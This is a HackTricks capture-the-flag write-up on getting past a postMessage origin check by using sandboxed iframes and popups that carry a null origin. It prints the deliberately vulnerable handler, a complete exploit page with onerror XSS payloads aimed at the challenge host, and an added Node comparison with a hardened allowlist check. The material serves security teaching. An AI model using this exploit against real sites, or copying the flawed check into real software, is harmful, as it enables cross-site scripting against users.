Bypassing SOP with Iframes - 1


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Iframes in SOP-1

In this challenge created by NDevTK and Terjanq you need to exploit the XSS in the following code:

```javascript
const identifier = "4a600cd2d4f9aa1cfb5aa786"
onmessage = (e) => {
    const data = e.data
    // The message is dropped only when BOTH the origin check and the
    // identifier check fail, so satisfying either one is enough to get through
    if (e.origin !== window.origin && data.identifier !== identifier) return
    if (data.type === "render") {
        renderContainer.innerHTML = data.body
    }
}
```

The main problem is that the main page runs DOMPurify over the data.body it sends, so in order to get your own HTML data to that code you need to bypass the e.origin !== window.origin check.

Let's look at the solution they propose.

SOP bypass 1 (e.origin === null)

When //example.org is framed inside a sandboxed iframe, the origin of the page will be null, i.e. window.origin === null. So just by framing the page via <iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php"> we could force a null origin.

If the page were embeddable, you could bypass that protection this way (cookies might also need to be set to SameSite=None).

SOP bypass 2 (window.origin === null)

A lesser known fact is that when the sandbox value allow-popups is set, the opened popup inherits all the sandboxed attributes unless allow-popups-to-escape-sandbox is also set. So, opening a popup from a null origin makes window.origin inside the popup null as well.

Challenge Solution

Therefore, for this challenge, one could create an iframe and open a popup to the page with the vulnerable XSS handler (/iframe.php); since window.origin === e.origin (both are null), it's possible to send a payload that will exploit the XSS.

That payload will obtain the identifier and send an XSS back to the top page (the page that opened the popup), which will change its location to the vulnerable /iframe.php. Because the identifier is known, it doesn't matter that the condition window.origin === e.origin is not satisfied (remember, the sender is the popup opened from the iframe, which has a null origin), because data.identifier === identifier. Then the XSS triggers again, this time in the correct origin.

```html
<body>
    <script>
        f = document.createElement("iframe")

        // Needed flags
        f.sandbox = "allow-scripts allow-popups allow-top-navigation"

        // Second communication with /iframe.php (this is the top page relocated)
        // This will execute the alert in the correct origin
        const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
            x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
        },1000);`.replaceAll("\n", " ")

        // Initial communication
        // Open /iframe.php in a popup, both iframes and popup will have "null" as origin
        // Then, bypass window.origin === e.origin to steal the identifier and communicate
        // with the top with the second XSS payload
        f.srcdoc = `
        <h1>Click me!</h1>
        <script>
            onclick = e => {
                let w = open('https://so-xss.terjanq.me/iframe.php');
                onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
                setTimeout(_ => {
                    w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
                }, 1000);
            };
        <\/script>
        `
        document.body.appendChild(f)
    </script>
</body>
```
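As an added example (not part of the challenge or of the original write-up), the check from /iframe.php is placed next to a hardened handler and both are run in Node against constructed MessageEvent-like objects for the situations described above; the identifier and the trusted parent origin are constructed placeholders.

```javascript
// Added example, not the challenge's code. The identifier and the trusted
// origin are constructed placeholders for this demonstration.
const IDENTIFIER = "constructed-secret-identifier";
const TRUSTED_ORIGIN = "https://parent.example"; // assumed origin of the legit parent page

// The challenge's check: the message is dropped only when BOTH conditions fail,
// so a sender that matches the receiver's origin OR knows the identifier passes.
// selfOrigin plays the role of window.origin in the receiving page.
function vulnerableCheck(e, selfOrigin) {
  const data = e.data;
  if (e.origin !== selfOrigin && data.identifier !== IDENTIFIER) return false;
  return data.type === "render";
}

// Hardened check: compare against a fixed allowlist instead of window.origin
// (which becomes the string "null" inside a sandboxed iframe or a popup it
// opens), reject opaque origins outright and require the identifier as well.
function hardenedCheck(e) {
  if (e.origin === "null" || e.origin !== TRUSTED_ORIGIN) return false;
  const data = e.data;
  if (!data || typeof data !== "object" || data.identifier !== IDENTIFIER) return false;
  return data.type === "render" && typeof data.body === "string";
}

// Constructed MessageEvent-like objects for the three situations in the write-up.
// receiverOrigin is what window.origin would be in the page running the handler.
const cases = {
  // Legitimate parent talking to an unsandboxed /iframe.php
  legit: { receiverOrigin: TRUSTED_ORIGIN, origin: TRUSTED_ORIGIN,
    data: { type: "render", identifier: IDENTIFIER, body: "<b>sanitized</b>" } },
  // SOP bypass 1/2: the victim runs inside a sandbox (framed, or a popup of a
  // sandboxed frame), so sender and receiver are both "null"; no identifier needed
  nullOrigin: { receiverOrigin: "null", origin: "null",
    data: { type: "render", body: "<img/src/onerror=alert(1)>" } },
  // Second stage: identifier leaked by the first XSS, message sent from the
  // "null" popup to the real-origin top page
  leakedId: { receiverOrigin: TRUSTED_ORIGIN, origin: "null",
    data: { type: "render", identifier: IDENTIFIER, body: "<img/src/onerror=alert(1)>" } },
};

// Returns, per case, whether each handler would render the attacker-controlled body.
function evaluate() {
  const out = {};
  for (const [name, e] of Object.entries(cases)) {
    out[name] = { vulnerable: vulnerableCheck(e, e.receiverOrigin), hardened: hardenedCheck(e) };
  }
  return out;
}
console.log(evaluate());
```

Only the legitimate message passes the hardened check; both bypass stages that the write-up walks through are accepted by the original `&&` logic and rejected once the origin is compared against a fixed allowlist and "null" is refused.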
